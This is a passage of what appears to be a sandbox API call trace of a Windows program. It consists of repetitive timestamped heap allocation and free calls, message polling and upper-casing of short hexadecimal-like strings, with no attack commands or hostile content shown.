dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0122.520] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.520] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0122.520] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0122.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa168 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0122.520] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0122.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0122.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0122.521] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0122.529] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0122.529] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0122.530] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.531] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0122.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0122.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0122.534] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0d8 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.534] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0122.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0122.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.535] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa030 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0122.535] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.535] 